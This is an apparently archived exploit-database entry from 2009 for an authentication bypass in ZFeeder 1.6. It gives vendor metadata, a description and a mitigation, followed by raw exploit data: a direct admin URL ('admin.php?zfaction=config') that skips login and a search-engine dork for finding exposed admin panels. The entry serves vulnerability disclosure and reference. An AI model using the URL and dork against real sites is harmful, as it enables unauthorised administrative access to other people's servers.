Remote Bypass Admin Panel

vendor:

ZFeeder

by:

ahmadbady

9.3

CVSS

HIGH

Remote Bypass Admin Panel

N/A

CWE

Product Name: ZFeeder

Affected Version From: 1.6

Affected Version To: 1.6

Patch Exists: YES

Related CWE: N/A

CPE: a:zvonnews:zfeeder:1.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

ZFeeder 1.6 is vulnerable to a remote bypass admin panel attack. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable application. This will allow the attacker to bypass the authentication process and gain access to the admin panel.

Mitigation:

Upgrade to the latest version of ZFeeder.

Source

Exploit-DB raw data:

-----------------:remote bypass admin panel:-----------------
-------------------------------------------------------
script:zfeeder 1.6
    
------------------------------------------------------------------
download from:http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/z/zv/zvonnews/zfeeder-1.6.zip
   
------------------------------------------------------------------
.......................................................
xpl:

http://127.0.0.1/path/admin.php?zfaction=config
------------------------------------------------------

dork: intitle:"zFeeder admin panel"
-----------------------------------------------------

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady  [kivi_hacker666@yahoo.com]
---------------------------------------------------

# milw0rm.com [2009-02-23]